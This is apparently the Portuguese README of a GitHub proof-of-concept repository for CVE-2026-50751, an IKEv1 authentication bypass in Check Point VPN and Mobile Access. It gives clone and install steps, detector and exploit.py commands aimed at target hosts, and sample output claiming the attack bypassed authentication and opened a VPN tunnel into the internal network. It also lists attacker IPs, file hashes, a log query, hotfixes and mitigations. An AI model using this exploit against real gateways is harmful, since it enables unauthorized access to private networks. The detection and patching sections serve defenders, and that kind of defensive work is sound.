
Vulnerabilidade: Fraqueza no fluxo lógico em Remote Access e Mobile Access
Este código é APENAS para fins educacionais e testes de segurança autorizados. O uso não autorizado contra sistemas sem permissão explícita é ILEGAL. O autor não se responsabiliza pelo uso indevido desta ferramenta.
CVE-2026-50751 é uma vulnerabilidade crítica de bypass de autenticação no protocolo IKEv1 (obsoleto) da Check Point, que afeta o Remote Access VPN e o Mobile Access. Um atacante não autenticado pode explorar uma falha na validação de certificados para estabelecer uma conexão VPN sem a necessidade de uma senha válida.
| Produto | Versões |
|---|---|
| Security Gateways | R80.40 - R82.10 com IKEv1 habilitado |
| Spark Firewalls | R80.20.X, R81.10.X, R82.00.X |
| Mobile Access | Todas as versões com IKEv1 |
# Clonar repositorio
git clone https://github.com/username/CVE-2026-50751-PoC
cd CVE-2026-50751-PoC
# Instalar dependencias
pip install -r requirements.txt
# Dar permisos de ejecución
chmod +x exploit.py
📦 Dependências
cryptography>=41.0.0
scapy>=2.5.0
Escaneamento de detecção
# Detectar si IKEv1 está habilitado
python3 detector.py -t 192.168.1.1 -p 500
# Escaneo rápido
python3 detector.py -t vpn.target.com -p 4500
Exploração (SOMENTE USO AUTORIZADO)
# Ejecutar bypass de autenticación
python3 exploit.py -t 192.168.1.1 -p 500
# Con interfaz específica
python3 exploit.py -t vpn.target.com --interface eth0
# Modo verbose
python3 exploit.py -t 192.168.1.1 -p 500 -v
Saída esperada
╔═══════════════════════════════════════════════════════════════╗
║ CVE-2026-50751 - Check Point IKEv1 Authentication Bypass ║
║ Critical VPN Authentication Bypass Exploit ║
║ CVSS: 9.3 | CISA KEV: 2026-06-08 ║
╚═══════════════════════════════════════════════════════════════╝
[1] Initiating IKEv1 Main Mode...
[+] Received response - SPI: a1b2c3d4e5f67890
[2] Sending crafted KE + NONCE payloads...
[+] Gateway accepted crafted KE/NONCE - Vulnerability triggered!
[3] Calculating authentication keys...
[4] Sending spoofed authentication...
[+] SUCCESS! Authentication bypassed!
[+] Established IKE SA without valid credentials
[5] Establishing VPN tunnel...
[+] VPN tunnel established!
[+] Internal network access available
[✓] EXPLOIT SUCCESSFUL
[✓] Authentication bypass achieved
[✓] VPN tunnel established
[!] System is VULNERABLE - Apply hotfix immediately
Pesquisar nos logs do SmartConsole
# Query para detectar atacantes
action:"Key Install" AND (src:45.77.149.152 OR dst:45.77.149.152)
IOCs Conhecidos
| Tipo | Valor | | IPs atacantes | 45.77.149.152, 209.182.225.136, 38.60.157.139, 162.33.177.101, 45.76.26.42, 144.208.127.155, 38.54.88.201, 38.54.107.167, 66.42.99.200, 45.63.104.106, 45.61.136.173 | | Hashes | 52fda5c1b9704544f32ee98d9060e689, 51d39aa39478beeac94f2d12f682ecce |
Opção 1 - Aplicar Hotfix (RECOMENDADO)
| Versão | Hotfix Take | Link | | R82.10 | Take 19 | Baixar | | R82 | Take 103 | Baixar | | R81.20 | Take 141 | Baixar |
Opção 2 - Mitigações Temporárias
Desabilitar clientes legados:
SmartConsole → Gateway → VPN Clients → Authentication
Desmarcar "Allow older clients"
Forçar somente IKEv2:
Global Properties → Remote Access → VPN Authentication
Selecionar "IKEv2 only"
Tornar obrigatório o Machine Certificate:
VPN Clients → Authentication → Machine Certificate Authentication
Definir como "Mandatory"
NVD - CVE-2026-50751
Check Point SK185033
CISA Known Exploited Vulnerabilities
Post do Blog - Check Point Research
| Data | Evento | | 2026-05-07 | Primeira exploração observada | | 2026-06-04 | Check Point inicia investigação | | 2026-06-08 | CVE publicado, CISA adiciona ao KEV | | 2026-06-11 | Prazo da CISA para aplicar o patch |
Este software é fornecido "como está", sem garantias de qualquer tipo. O autor não é responsável pelo uso indevido desta ferramenta. Use-a apenas em sistemas que você possua ou para os quais tenha autorização explícita para testar.
Para relatar bugs ou contribuir:
Abrir uma issue no GitHub
Contato: [email protected]
Check Point Research - Pela descoberta e análise
CISA - Pela coordenação e divulgação
Comunidade de segurança - Pela resposta rápida
⭐ Se este PoC foi útil para você, considere dar uma estrela ao repositório
text
📦 requirements.txt txt cryptography>=41.0.0 scapy>=2.5.0 colorama>=0.4.6
⚠️ Nota importante para o GitHub: